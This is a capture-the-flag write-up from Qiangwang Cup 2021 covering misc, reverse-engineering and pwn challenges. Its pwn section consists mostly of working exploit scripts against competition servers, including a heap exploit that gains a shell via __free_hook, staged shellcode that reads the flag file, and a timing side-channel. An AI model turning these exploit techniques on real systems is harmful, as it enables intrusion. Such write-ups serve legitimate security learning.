强网杯 2021 WriteUp - CNSS

Misc

签到

flag{welcome_to_qwb_s5}

问卷题

填问卷

CipherMan

memory 文件为 win7 内存镜像

扫一下文件可以找到 BitLocker 的恢复密钥

用 bdemount 和恢复密钥挂载 Secret 有一个 NTFS 分区

挂载分区找到 README.txt 文件内容即为 flag

PWN

baby_diary

from pwn import *
from easypwn import *
import os
import sys
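context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
# Run from the script's own directory so the relative binary path below resolves.
os.chdir(sys.path[0])
# Thin wrappers around the pwntools tube `p` (bound below); `rud` drops the delimiter.
rn = lambda n : p.recv(n)
rc = lambda : p.recv()   # was `pA.recv()` — `pA` is never defined (the sibling scripts use `p`)
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)
# `run` comes from easypwn (not shown); `r` is only used for symbol lookups later,
# while every wrapper above talks to the remote tube `p`.
r=run('./pp','231','092')
p=remote("8.140.114.72",1399)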
def add(ind,size,ss=b''):
    """Menu option 1: request a chunk of `size` bytes and send `ss` as its content.

    `ind` is accepted for symmetry with dele()/show() but this menu entry never
    asks for an index, so it is unused.  When `ss` is shorter than `size` a
    newline is appended so the service's read terminates.
    """
    sla('>>','1')
    sla('size',str(size))
    payload = ss if len(ss) == size else ss + b'\n'
    sa('content',payload)
def dele(ind):
    """Menu option 3: free the entry at index `ind`."""
    for prompt, answer in (('>>', '3'), ('index', str(ind))):
        sla(prompt, answer)

def show(ind):
    """Menu option 2: print the entry at index `ind` (the caller reads the reply)."""
    for prompt, answer in (('>>', '2'), ('index', str(ind))):
        sla(prompt, answer)
# byte(p+size+1)==2*n+bytesum(p)
# gdb breakpoints/expressions for r.bp() (easypwn); kept for re-runs under a debugger.
raw='''
0x1716
0x187c
0x17D7
set $addlist=(unsigned long*)$rebase(0x4060)
set $sizelist=(unsigned long*)$rebase(0x4140)
''' #add dele
# Allocate/free sequence driven purely through add()/dele()/show().  The order of
# these calls is load-bearing (it shapes the service's heap) — do not reorder.
# `ropx` comes from easypwn (not shown); presumably it packs its arguments into
# bytes — verify there.
for i in range(7):
    add(i,0x27)
add(7,0x107)
add(8,0x507)
add(9,0x4f7)
add(10,0x457)
add(11,0x27)
dele(8)
add(8,0x27,ropx(0x55,0x500))
add(12,0x27)
add(13,0x477,ropx(0))
add(14,0x27)
add(15,0x47)
dele(10)
add(10,0x27)
for i in range(7):
    dele(i)
dele(12)
dele(10)
add(0,0x457,ropx(0x5))
for i in range(7):
    add(i,0x27)
add(12,0x27)
for i in range(1,7):
    dele(i)
dele(11)
dele(12)
dele(8)
for i in range(7):
    add(i,0x27)
add(11,0x27)
dele(14)
add(12,0x27,ropx([0x27]))
dele(12)
add(12,0x27,ropx(0x5,[0x18]))
dele(9)
add(9,0x47)
# Information leak: show(13) prints 6 bytes of a pointer; zero-pad to 8 and
# rebase against main_arena to obtain the libc load address.
show(13)
ru('content: ')
# NOTE(review): `r.symbol[...]` here vs `r.symbols(...)` below — one of the two
# spellings is presumably wrong for easypwn; confirm against that helper.
r.libc_base=u64(rn(6).ljust(8,b'\x00'))-r.symbol['main_arena']-96
dele(15)
dele(9)
dele(11)
# Final three allocations: the first writes to __free_hook, the second holds
# "/bin/sh", the third the address of system; dele(11) then frees the
# "/bin/sh" chunk.
add(9,0x27,ropx([0x10],r.symbols('__free_hook')))
add(11,0x47,ropx('/bin/sh\x00'))
add(15,0x47,ropx(r.symbols('system')))
# r.bp(raw=raw)
dele(11)
p.interactive()

[强网先锋]orw

from pwn import *
from easypwn import *
import os
import sys
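context.terminal=['tmux','splitw','-h']
context.log_level='DEBUG'
context.arch='amd64'
# Run from the script's own directory so the relative binary path below resolves.
os.chdir(sys.path[0])
# Thin wrappers around the pwntools tube `p`; `rud` drops the delimiter.
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)

# `run` comes from easypwn (not shown).  `p` starts as the local process tube and
# is rebound to the remote service further down.
r=run('./p1','223','0112')
p=r.p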
# # -1-1 0-8
def add(ind,ss):
    """Menu option 1: store `ss` in slot `ind`; the size sent is len(ss) and the
    content is sent raw (no trailing newline)."""
    sla('>>','1')
    sla('index',str(ind))
    sla('size',str(len(ss)))
    sa('con',ss)
def dele(ind):
    """Menu option 4: delete slot `ind`."""
    for prompt, answer in (('>>', '4'), ('index', str(ind))):
        sla(prompt, answer)
def q():
    """Menu option 5 (quit/trigger); what the service does afterwards is read by the caller."""
    sla('>>', '5')
# gdb setup for r.bp() (easypwn): a watch expression and three breakpoints.
raw='''
set $a=(unsigned long*)$rebase(0x2020A0)
0xEC7
0xFE7
0x10A5
'''
p=remote("39.105.131.68",12354)
# Stage 1 (8 bytes, NOP-padded): rsi = rsp, rax = rdx = rdi, then a short forward jump.
# It is stored at index -13 — presumably the service does no lower-bounds check
# on the index (that missing check is the defect being used here).
sh='''
push rsp
pop rsi
push rdi
pop rax
push rdi
pop rdx
jmp .+0x1a
'''
# r.bp(raw=raw)
add(-13,asm(sh).ljust(8,b'\x90'))
# Stage 2 (slot 0): dl = 0xff, issue the syscall set up by stage 1, then jump to
# whatever that syscall placed on the stack.
sh='''
mov dl,0xff
syscall
call rsp
'''
add(0,asm(sh).ljust(8,b'\x90'))
q()
# Stage 3, sent raw: open("flag", 0, 0) (rax=2, rdi -> the pushed r9 string),
# read(fd, rbp+0x200, rdx) (rax=0; rdx is taken from r11 via xchg), then
# write(1, rbp+0x200, rdx) (rax=1, rdi=1).  `str2hex` comes from easypwn.
sh='''
xor rax,rax
push rax
push rax
inc rax
inc rax
pop rsi
pop rdx
mov r9,{}
push r9
push rsp
pop rdi
syscall
xchg rax,rdi
xor rax,rax
mov rsi,rbp
add rsi,0x200
xchg r11,rdx
syscall
xor rax,rax
push rax
pop rdi
inc rdi
inc rax
syscall
'''.format(str2hex("flag\x00"))
sd(asm(sh))
p.interactive()

[强网先锋]shellcode

from pwn import *
from easypwn import *
import os
import sys
import datetime
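context.terminal=['tmux','splitw','-h']
# context.log_level='DEBUG'
context.arch='amd64'
context.bits=64
# Run from the script's own directory so the relative paths below resolve.
os.chdir(sys.path[0])
# Thin wrappers around the pwntools tube `p` (rebound on every loop iteration
# further down); `rud` drops the delimiter.
rn = lambda n : p.recv(n)
rc = lambda : p.recv()
ru = lambda s :p.recvuntil(s)
rud = lambda s :p.recvuntil(s,drop=True)
rl = lambda : p.recvline()
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
sa = lambda r,s : p.sendafter(r,s)
sla = lambda r,s : p.sendlineafter(r,s)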

# Offset of the byte currently being recovered (incremented once per hit below).
off=0
# jmp $+4
# jmp $+7
# call $-2

# Stage 1 (64-bit), later ASCII-encoded by ALPHA3 before it is sent:
#   mmap(0x10000, 0x1000, 7, ...): rax=9, rdi=1<<16, rsi=1<<12, rdx=7, r8=-1, r9=0.
#   NOTE(review): 0x22 (the flags) is placed in rcx, but the x86-64 syscall ABI
#   takes the 4th argument in r10 — this presumably relied on r10's prior value.
#   read(0, map+0x800, 0x800): rax=0, rdi=0, rdx=1<<11, rsi = mapping + 0x800.
#   Then rsp is moved into the mapping and `push 0x23; push rsi; retfq` far-returns
#   into the freshly read bytes with CS=0x23 (the 32-bit code segment).
s1='''
push 9
pop rax
xor rdi,rdi
mov rsi,rdi
inc rdi
shl rdi,16
inc rsi
shl rsi,12
push 7
pop rdx
push 0x22
pop rcx
xor r8,r8
xor r9,r9
dec r8
syscall
mov rsi,rax
xor rax,rax
push rax
push rax
pop rdi
pop rdx
inc rdx
shl rdx,11
add rsi,rdx
syscall
mov rsp,rsi
push 0x23
push rsi
retfq
'''
# Stage 2 (32-bit, executed after the far return): open("flag", 0) via int 0x80
# (eax=5, ebx -> "flag\0" on the stack, ecx=0), then `push 0x33; push 0x10818;
# retf` back to 64-bit code at 0x10818 — presumably 0x10800 + len(s2), i.e. the
# start of s3 which is sent right after s2.
s2='''
push 0
push 0x67616c66
mov ebx,esp
xor ecx,ecx
push 5
pop eax
int 0x80
push 0x33
push 0x10818
retf
'''

# `var` is reassigned by the loop below (this initial value is never read);
# `sss` collects the recovered byte values in order.
var=0x66
sss=[]

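# Timing oracle, one connection per guess: stage 3 reads the opened file into
# the mapping and compares byte `off` with the guess `var`.  On a match it calls
# exit_group (eax=231) so the connection drops almost immediately; otherwise the
# `jne $+7` skips the exit and the read times out.  The outer loop advances
# `off` after each hit and stops once '}' (0x7d) has been recovered.
while True:
    for var in range(0x20,0x7f):
        s3='''
push 3
pop rdi
xor rax,rax
mov rsi,rax
inc rsi
shl rsi,16
push 0xff
pop rdx
syscall
mov bl,%d
xor rdi,rdi
xor eax,eax
cmp bl,byte ptr [rsi+%d]
jne $+7
mov eax,231
syscall
'''%(var,off)
        logx(chr(var))
        # r=run('./pp','223')
        p=remote('39.105.137.118',50050)
        # p=r.p
        ss1=asm(s1,arch='amd64',bits=64)
        ss2=asm(s2,arch='i386',bits=32)
        ss3=asm(s3,arch='amd64',bits=64)
        # Hand stage 1 to the ALPHA3 encoder through a file; the handles are
        # closed explicitly so the bytes are flushed before the child runs and
        # no descriptor is leaked per iteration (the original never closed them).
        with open('in','wb') as fh:
            fh.write(ss1)
        os.system('python2 alpha3/ALPHA3.py x64 ascii mixedcase RBX --input="in" > out')
        with open('out','r') as fh:
            res=fh.read()
        # r.bp(0x40026D)
        sd(res)
        sleep(0.1)
        sd(ss2+ss3)
        starttime = datetime.datetime.now()
        p.recvrepeat(timeout=0.1)
        endtime = datetime.datetime.now()
        # One socket per guess — close it instead of leaking it across the loop.
        p.close()
        # `.microseconds` is only the sub-second part of the delta, so a delay of
        # e.g. 1.01 s would have passed the original `<= 40000` check; compare the
        # whole elapsed time instead (40 ms threshold unchanged).
        if (endtime - starttime).total_seconds() <= 0.04:
            off+=1
            sss.append(var)
            break
    if var==0x7d:
        break

# # 0x400000
print(''.join([chr(i) for i in sss]))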

Re

ezmath

if ( strlen(s) == 38 )
{
for ( i = 0; i <= 37; i += 2 )
{
if ( dbl_4020[i / 2] != sub_13F3(*(unsigned __int16 *)&s[i]) )
goto LABEL_2;
}
puts("correct");
result = 0LL;
}
/* Decompiled per-character check: starting from 0.2021, applies
 * v = e - k * v for every k in [8225, a1) and returns the result.
 * For a1 <= 8225 the loop body never runs and 0.2021 is returned unchanged. */
double __fastcall sub_13F3(int a1)
{
  double acc = 0.2021;
  int k = 8225;

  while ( k < a1 )
  {
    acc = 2.718281828459045 - (double)k * acc;
    ++k;
  }
  return acc;
}

s 为输入

*(unsigned __int16 *)&s[i]) 这是取了两位char为一个int,我们可以把他当成一个int
#include <iostream>
#include <cstdio>
// The 19 target values the binary compares against (one per 16-bit input pair).
// Several entries repeat (indices 4/6/12, 8/10), i.e. repeated characters in the
// expected input.  Declared long double here while the binary uses double.
long double dbl_4020[19] =
{
0.00009794904266317233,
0.00010270456917442,
0.00009194256152777895,
0.0001090322021913372,
0.0001112636336217534,
0.0001007442677411854,
0.0001112636336217534,
0.0001047063607908828,
0.0001112818534005219,
0.0001046861985862495,
0.0001112818534005219,
0.000108992856167966,
0.0001112636336217534,
0.0001090234561758122,
0.0001113183108652088,
0.0001006882924839248,
0.0001112590796092291,
0.0001089841164633298,
0.00008468431512187874
};
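// Lookup table: b[a1] holds the recurrence value for input a1 (filled by dabiao()).
static const int TABLE_SIZE = 1000000;
long double b[TABLE_SIZE];

// Fill b[a1] with v = e - i * v iterated for i in [8225, a1), starting from the
// seed the write-up identifies as the binary's real v3.  Indices outside the
// table are ignored instead of writing past `b` (the original had no check).
void dabiao(int a1)
{
  if (a1 < 0 || a1 >= TABLE_SIZE)
    return;
  long double v3 = 0.0004829108052495089;
  // printf("%llf\\n",v3);
  for (int i = 8225; i < a1; ++i)
    v3 = 2.718281828459045 - (long double)i * v3;
  b[a1] = v3;
}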
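// Build the table, then look each target value up by exact comparison.
// Fixes: "0x%h" is not a valid printf conversion (now "0x%x"), and a target
// with no exact match used to make the search loop spin forever — it is now
// reported and skipped.  NOTE(review): `==` between a long double computed by
// the recurrence and a double constant rarely holds (the write-up says this
// table approach did not work); a tolerance compare may be needed.
int main()
{
  printf("OK\\n");
  for(int i = 0;i <= 8225;i++)
    b[i] = 0.0004829108052495089;
  for(int i = 8225;i < 1000000;i++)
    dabiao(i);
  printf("OK\\n");
  for (int j = 0; j < 19; j++)
  {
    bool found = false;
    for(int i = 0;i < 1000000;i++)
    {
      if(b[i] == dbl_4020[j])
      {
        printf("0x%x",i);
        found = true;
        break;
      }
    }
    if (!found)
      printf("no exact match for entry %d\\n", j);
  }
  return 0;
}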

这里有 SMC(应该),它好像 patch 了那个 v3,我在看

// Self-modifying-code helper (decompiled).  Makes the page containing the word
// just before qword_2018 readable, writable *and* executable (prot 7 =
// PROT_READ|PROT_WRITE|PROT_EXEC), calls into the middle of unk_11C8 (+1 byte,
// i.e. a deliberately misaligned entry), and stores the returned value into
// that word.  Because the page is RWX, treat it as both code and data when
// patching or when the write-up's "patch v3" step is reproduced.
__int64 sub_1391()
{
  __int64 result; // rax

  // Round the address down to its 4 KiB page and unprotect one page.
  mprotect((void *)((unsigned __int64)(&qword_2018 - 1) & 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7);
  // The decompiler reconstructs the callee as (fn, double, double) -> double;
  // sub_1301 is passed as a callback.
  result = ((double (__fastcall *)(__int64 (__fastcall *)(), double, double))((char *)&unk_11C8 + 1))(
sub_1301,
0.0,
1.0);
  // Write the result back into the word that was unprotected above.
  *(&qword_2018 - 1) = result;
  return result;
}

nop edx是啥

混淆的,可以 patch 掉 push rbx 和 nop edx,就正常了

image.png

真正的v3,它好像无反调试,我tm直接动态看结果

v3 = 0.0004829108052495089;
for ( i = 8225; i < a1; ++i )
v3 = 2.718281828459045 - (double)i * v3;
return v3;

说起来 2.718281828459045 是不是 e 啊

打表写不了

import binascii
# The 19 target values from the binary, in input order.
table=[
0.00009794904266317233,
0.00010270456917442,
0.00009194256152777895,
0.0001090322021913372,
0.0001112636336217534,
0.0001007442677411854,
0.0001112636336217534,
0.0001047063607908828,
0.0001112818534005219,
0.0001046861985862495,
0.0001112818534005219,
0.000108992856167966,
0.0001112636336217534,
0.0001090234561758122,
0.0001113183108652088,
0.0001006882924839248,
0.0001112590796092291,
0.0001089841164633298,
0.00008468431512187874
]

# For each target print hex(floor(e / value)), comma-separated with a trailing comma
# (same output as printing each value with end=',').
print(",".join(hex(int(2.718281828459045 / value)) for value in table), end=",")
#include <cstdio>
// 19 little-endian 16-bit values (plus a 0 terminator) recovered from the table above.
unsigned short s_[]={0x6c67,0x6762,0x737c,0x6162,0x5f6e,0x6965,0x5f6e,0x6568,0x5f6a,0x656d,0x5f6a,0x616b,0x5f6e,0x6164,0x5f62,0x6974,0x5f6f,0x616d,0x7d62,0};

// View the values as 38 bytes, decrement every even-indexed byte (the low byte
// of each 16-bit value) and print the result as a C string.
int main(){
  char *s=(char *)s_;
  for (int i = 0; i < 38; i += 2)
    s[i]--;
  printf("%s",s);
}

unicorn_like_a_pro

  • 用于恢复 binary

    # 0x55 (token, size) pairs, zero-padded: token = alg(data, block_addr) identifies
    # a block head and size is its encoded length (see recover(), which scans this
    # linearly and takes the first match).
    block_table = [0x02F73020, 0x00000015, 0x09D3473A, 0x00000051, 0x0EF87B55, 0x0000000D, 0x147CB028, 0x00000023, 0x15F833AA, 0x00000030, 0x17086780, 0x00000018, 0x1733A9D4, 0x00000014, 0x17D61EE8, 0x00000051, 0x1D52F19E, 0x00000011, 0x1F732DE0, 0x0000000D, 0x1FBECFAD, 0x0000001B, 0x245BD7C8, 0x00000055, 0x25E7ABEE, 0x00000009, 0x2882C190, 0x000000A2, 0x2A2084A0, 0x00000075, 0x326AA6AE, 0x00000036, 0x33074A36, 0x00000024, 0x3440BD69, 0x0000002C, 0x362A1FC3, 0x0000002C, 0x3C0450D0, 0x0000000D, 0x3CB575FD, 0x00000011, 0x41B3B26E, 0x0000004E, 0x46005120, 0x00000011, 0x465A72CF, 0x00000002, 0x492145A0, 0x0000000D, 0x49AA4CE0, 0x0000002D, 0x4BD63647, 0x0000004E, 0x4BF84A87, 0x0000000D, 0x4D102445, 0x00000033, 0x4D4D3C55, 0x0000001B, 0x53723232, 0x0000000A, 0x5809B5CB, 0x000000A2, 0x5B12FFCE, 0x00000015, 0x5B1F3000, 0x00000051, 0x5D9FBD20, 0x00000027, 0x6219EED9, 0x0000008A, 0x65D82D17, 0x0000004C, 0x67F5671A, 0x00000063, 0x6CE2CBC1, 0x00000033, 0x718A739C, 0x0000000B, 0x71A62DD7, 0x00000015, 0x7693A1F6, 0x00000014, 0x7A473FB0, 0x00000047, 0x7AEFEDDC, 0x00000011, 0x7AF2CF90, 0x0000004F, 0x7BE0B8B0, 0x0000001B, 0x80EB3E88, 0x0000000A, 0x8213506A, 0x0000000C, 0x82468114, 0x00000011, 0x86B872A2, 0x0000001C, 0x87FBD296, 0x00000019, 0x88719339, 0x00000016, 0x89E2630A, 0x00000024, 0x8CB6536E, 0x0000004E, 0x92316E00, 0x00000015, 0x9415A51E, 0x0000004F, 0x94D658E0, 0x0000002B, 0x97E8DFCD, 0x00000036, 0x992E3874, 0x0000002A, 0x9B06958D, 0x00000030, 0x9B36B480, 0x0000000D, 0xA03CEFAD, 0x0000005A, 0xA39F47E6, 0x0000004E, 0xA946DEC4, 0x000000B4, 0xAE6173DC, 0x00000051, 0xB044A68D, 0x0000008C, 0xB29E36A8, 0x0000000B, 0xB82781F4, 0x0000000D, 0xC14DFAF8, 0x00000011, 0xC3F42E20, 0x0000001E, 0xC5E0065E, 0x00000067, 0xCAD68B21, 0x00000039, 0xCBF29AC7, 0x00000011, 0xCE8729BC, 0x0000001B, 0xD2A85A94, 0x00000004, 0xD34FA4F3, 0x00000011, 0xD64611B0, 0x00000058, 0xD814FD56, 0x00000018, 0xDD386A80, 0x0000000A, 0xDE82DFAC, 0x00000011, 0xEC68D16F, 0x0000001B, 0xEEDE845B, 0x0000003F, 0xF235F260,
0x0000008D, 0xF9AA1F0B, 0x00000087, 0xFC200887, 0x00000011, 0xFED657A3, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000]

    # 0x55 records of five dwords, zero-padded: (tail token, left delta, left data
    # delta, right delta, right data delta).  recover() matches the tail token and
    # follows both successors, adding the deltas to `tail` / `data` respectively.
    jmp_table = [0x00412F5E, 0xFFFFFA22, 0x14252652, 0xFFFFF9AC, 0x66CEF8EC, 0x0251D934, 0x0000009F, 0xC56FBF59, 0xFFFFFF61, 0xAA4D5B7C, 0x02745896, 0xFFFFFB7F, 0x34B6D31E, 0xFFFFFBB0, 0x302CC828, 0x02AC5992, 0xFFFFF524, 0x67CC4064, 0xFFFFF483, 0x8A5D9B26, 0x046254D0, 0xFFFFFC37, 0x074AB936, 0xFFFFFC7F, 0xB8EA37F7, 0x0CACD9FE, 0x0000007F, 0x6112F222, 0x00000002, 0x47A72561, 0x0F0FE6EB, 0xFFFFFBAE, 0x0A1411E7, 0xFFFFFC85, 0x3BE88B46, 0x0FC59DC2, 0xFFFFF72F, 0x7D12A5EF, 0xFFFFF691, 0xE67393D6, 0x10B1EBCA, 0x000001CF, 0x473A1295, 0x0000022E, 0x7BC15385, 0x1565D41D, 0xFFFFFDC4, 0x05D337BE, 0xFFFFFE7E, 0xE12982E4, 0x18909E40, 0x000005EB, 0xAE2337AF, 0x000005B1, 0x8E0AB2ED, 0x1AE7593A, 0xFFFFF3BC, 0x23E9058D, 0xFFFFF40B, 0xDFA6CF3E, 0x1B47DA81, 0xFFFFF8C3, 0x349CC616, 0xFFFFF7E9, 0x70C290D0, 0x1D816435, 0x00000002, 0x43F999C9, 0xFFFFFFD8, 0xAB0BCA16, 0x1DACC905, 0xFFFFFF54, 0x5C129962, 0xFFFFFD06, 0xE4515A41, 0x1E03B13C, 0xFFFFFF80, 0x7E763806, 0xFFFFF36A, 0xA25F3D93, 0x22FEFC06, 0xFFFFFCDD, 0xB94E0C2F, 0xFFFFFCB6, 0xF023033D, 0x26B1E690, 0xFFFFFDAB, 0xD0C7ED0C, 0xFFFFFE9B, 0xD49872C6, 0x2A652084, 0x000001EA, 0xDF9B65EE, 0x00000051, 0x5CC5AB90, 0x2FBEBD25, 0x0000048F, 0x60A4E9F2, 0x000009AF, 0x42FE8B0D, 0x34F12D90, 0x000004C0, 0xF6257D94, 0x00000480, 0x5227DE21, 0x35F591D0, 0xFFFFFCA1, 0xDA83E113, 0xFFFFF998, 0x805C7ECB, 0x37EB0B72, 0xFFFFF3EC, 0x7480201A, 0xFFFFF903, 0xAC977E11, 0x389A58A8, 0x00000189, 0xE4005CD7, 0xFFFFFDEC, 0xB043695F, 0x3CB24155, 0x0000084C, 0x8ACB6FF1, 0x00000899, 0xACB471A5, 0x3DCBCDE3, 0x000007A8, 0xA84E3072, 0x00000384, 0xB2624259, 0x3F5290DE, 0xFFFFFE25, 0x8AC11F92, 0xFFFFFD8A, 0x44ACCD78, 0x47FF9B7E, 0x00000A81, 0x9833BF9C, 0x00000B35, 0x9B7199CD, 0x4C7867E6, 0x0000011C, 0x68BB4F80, 0x0000002E, 0x75B675CD, 0x53ADCD80, 0x000004E8, 0x6AA4F705, 0x00000452, 0xBA7C314B, 0x566E1640, 0x00000C8E, 0x203E3737, 0x00000C38, 0xF9367ED9, 0x5EDBB130, 0x000004FF, 0xD4F71A40, 0x000002AA, 0x35DC4141, 0x6C29C83A, 0x00000013, 0xBEAD8A76, 0xFFFFFFB5, 0x7A8A43EF,
0x6E036C9C, 0x00000BD5, 0x225F81E0, 0x00000D89, 0x3C25944D, 0x6FDCCE50, 0x00000605, 0xD3126740, 0x000003D5, 0xA3DA544C, 0x7132D345, 0x0000064E, 0x00915A5A, 0x000006DD, 0x5BCB6B22, 0x720DBD5C, 0x000008C3, 0x64DCFDF6, 0x00000858,0x190B20BB, 0x7A035AD4, 0x00000424, 0x4DD955FB, 0x000004BF, 0xF65150B5, 0x7CBAED22, 0x00000AA1, 0x62CC154B, 0xFFFFFC58, 0x8DD5CEDB, 0x7EBF8EA8, 0x00000458, 0xCE844A0E, 0xFFFFF734, 0x9079D6BA, 0x804885CD, 0x000007BB, 0x89A8DA66, 0x00000136, 0x7185B813, 0x82190F37, 0xFFFFF58C, 0x013FA7D4, 0xFFFFF4AB, 0x7518093D, 0x83F7826A, 0x00000917, 0x2F33C3DD, 0xFFFFFBF0, 0x02A289B1, 0x8481BFD5, 0xFFFFF927, 0x72EED2D1, 0xFFFFF80A, 0xF46FD351, 0x85A69D6E, 0x000000B4, 0x27A3BB0F, 0x00000181, 0x49235BC0, 0x85F73150, 0x00000259, 0xA300692F, 0x000009BD, 0x5A3E46A9, 0x86E2497A, 0xFFFFFB53, 0xE7614707, 0xFFFFFBB3, 0xFA190B2A, 0x8B261F60, 0xFFFFF323, 0x97B9CC33, 0xFFFFFAB7, 0x2CB73BF0, 0x8B42B00C, 0x00000871, 0xA57A2DE3, 0x00000797, 0xA73082D6, 0x8E4C5C94, 0x000000FE, 0xEE4B594B, 0xFFFFF999, 0xDCE3B74D, 0x913A9FDB, 0xFFFFFE1C, 0x1BFFA329, 0xFFFFFD31, 0x49B21C95, 0x922BFB96, 0xFFFFF61B, 0x4FAFD829, 0xFFFFFBBA, 0x6BD5D317, 0x9F4B8702, 0xFFFFFEC1, 0xB691AD49, 0xFFFFFEF2, 0xCE6C6FE9, 0xA2CEAAA6, 0xFFFFFD89, 0x60E52701, 0xFFFFFCB2, 0x25AD9A9D, 0xAA970D72, 0xFFFFF2BB, 0xC1F58CAC, 0xFFFFF2AB, 0x20B8FE22, 0xABC02B72, 0xFFFFF94B, 0xFF6EA5A6, 0xFFFFFA6A, 0x1CD46647, 0xAE535E9E, 0x000003EC, 0x31246F6B, 0x0000035B, 0x50E2A20A, 0xB7337941, 0xFFFFF856, 0xD1A79AD7, 0xFFFFF955, 0x14673B75, 0xBB8DB95E, 0xFFFFFEEB, 0x6A7F1E5A, 0xFFFFF3B3, 0x1EF2F3AA, 0xBC1EDA22, 0xFFFFFB90, 0xE247955F, 0xFFFFFCE6, 0xA0351A85, 0xBCD91FE8, 0x0000008C, 0x71A348B9, 0x00000030, 0x821754EF, 0xBD38E305, 0xFFFFFF59, 0xE694333F, 0xFFFFFEF9, 0x436B1A45, 0xBE1AA65A, 0xFFFFF93D, 0x8761A810, 0xFFFFFEEB, 0xB2DB19FA, 0xC052453C, 0x000009B5, 0xB05027D7, 0x000009C5, 0xBCA91679, 0xC4A2D780, 0x000008B9, 0xE42FD068, 0x000007C1, 0x9F8B2B83, 0xC6A236BA, 0xFFFFFDBB, 0x20649A12, 0xFFFFFD09, 0x5F73FD94, 0xC6BB5160,
0xFFFFFE90, 0x0ED42674, 0xFFFFFF4B, 0xA76699CC, 0xCB74E940, 0x000003E3, 0x7DA194FF, 0xFFFFFCDA, 0xB23E5B15, 0xD027B387, 0xFFFFF701, 0x880BCC4F, 0xFFFFF785, 0xFEA3D685, 0xD1127D6B, 0xFFFFFAC0, 0xDF3D499A, 0x00000362, 0x84B7777D, 0xD6F5F913, 0xFFFFFCCD, 0xA5D89DB8, 0xFFFFFCAB, 0xF69BAE29, 0xDD04F828, 0xFFFFF705, 0xE18F3BA0, 0xFFFFF64D, 0xEBC799B0, 0xDDF22CB8, 0x0000075D, 0x47F7B857, 0x000001B3, 0x5C1CDEA9, 0xDF34D0A8, 0x0000014D, 0xBFE2CAD5, 0x00000201, 0x1F0C8A89, 0xE146EA40, 0x0000046D, 0x189EB8F9, 0xFFFFF6FB, 0x4CA1090D, 0xE231C560, 0x00000710, 0x2E586529, 0xFFFFFF17, 0x0E9AA776, 0xE2FC6838, 0x00000733, 0xB73DDD7A, 0x00000753, 0x14A1BDE4, 0xE44AE35D, 0x000002C8, 0x46B1F3D1, 0xFFFFFA2D, 0xD2295816, 0xE5AF4AB1, 0x00000DB0, 0x0AFF4FF9, 0x00000D91, 0xB17A4340, 0xE7E3CF21, 0x00000656, 0x9FC50924, 0x00000658, 0x31615022, 0xE8815965, 0x00000BCB, 0x6F51A655, 0x00000C0A, 0x72F5680C, 0xEBDF0F14, 0xFFFFF2B1, 0xD36EC5D4, 0xFFFFF239, 0x3B711343, 0xEC12E59B, 0x00000270, 0x3A38D2E8, 0x0000023D, 0x68D07674, 0xF4013920, 0x00000703, 0xD83CCFAA, 0x000007BA, 0x46891EEB, 0xF6847EC1, 0xFFFFFE62, 0x6D4BAAFC, 0xFFFFFD92, 0x5E6F5A94, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]

    class Block:
        """One recovered basic block.

        addr/size are the block's address and decoded length, left/right the
        two successor addresses (the edges done() prints as Jz/Jnz) and code
        the decoded bytes.  The class attributes are defaults kept for
        compatibility; __init__ always sets the instance fields.
        """

        addr = 0
        size = 0
        left = 0
        right = 0
        code = b""

        def __init__(self, addr, size, left, right, code = b"") -> None:
            self.addr, self.size = addr, size
            self.left, self.right = left, right
            self.code = code

    def DWORD(x):
        """Truncate `x` to an unsigned 32-bit value."""
        return x & 0xFFFFFFFF

    def alg(x, y):
        """Token mix used by the binary's tables: x ^ y ^ (x*y mod 2^32) ^ (x+y mod 2^32)."""
        return x ^ y ^ DWORD(x * y) ^ DWORD(x + y)

    def recover(addr, data):
        """Walk the obfuscated control-flow graph from `addr` with running key `data`.

        Looks the head token up in block_table for the block size, the tail token
        up in jmp_table for the two successors, recurses into both, then decodes
        the block bytes (XOR with the 4-byte little-endian key) and records a
        Block.  addr_list doubles as the visited set; 0x10a3 is special-cased as
        an unconditional jump to 0x1eec.  Both table scans take the first match.
        """
        if addr in addr_list:
            return
        if addr == 0x10a3:
            block_list.append(Block(addr, 0, 0x1eec, 0x1eec, b""))
            recover(0x1eec, DWORD(data+0xD4F64670))
            return
        addr_list.append(addr)

        head_token = alg(data, addr)
        size = next((block_table[2*i+1] for i in range(0x55) if block_table[2*i] == head_token), -1)
        if size == -1:
            # raise AssertionError()
            return

        tail = addr + size - 2
        tail_token = alg(data, tail)
        for i in range(0x55):
            if jmp_table[5*i] != tail_token:
                continue
            left = jmp_table[5*i+1]
            right = jmp_table[5*i+3]
            recover(DWORD(tail+left), DWORD(data+jmp_table[5*i+2]))
            recover(DWORD(tail+right), DWORD(data+jmp_table[5*i+4]))

            key = data.to_bytes(4, "little")
            raw = code[addr-0x1000: addr-0x1000+size-2]
            decoded = bytes(raw[k] ^ key[k % 4] for k in range(size-2))
            block_list.append(Block(addr, size-2, DWORD(tail+left), DWORD(tail+right), decoded))
            break

    # The original (still obfuscated) code bytes; recover() indexes them relative to 0x1000.
    with open("origin_code", "rb") as f:
        code = f.read()

    addr_list = []   # visited block addresses
    block_list = []  # recovered Block objects
    # Entry block and its initial key, then put both lists in address order.
    recover(0x1000, 0x3265B1F5)
    block_list.sort(key=lambda blk: blk.addr)
    addr_list.sort()

    def get_block_idx(addr):
        """Index of the block starting at `addr` in block_list, or None if there is none."""
        for idx, blk in enumerate(block_list):
            if blk.addr == addr:
                return idx
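    paddr = 0x1000
    # Re-emit the blocks in address order.  After each block's bytes come two
    # 6-byte rel32 jumps (0f 85 = jne, 0f 84 = je); `left`/`right` are the
    # displacements to the successor blocks done() labels Jz/Jnz.  A
    # displacement is measured from the end of its own jump, hence +6 / +12.
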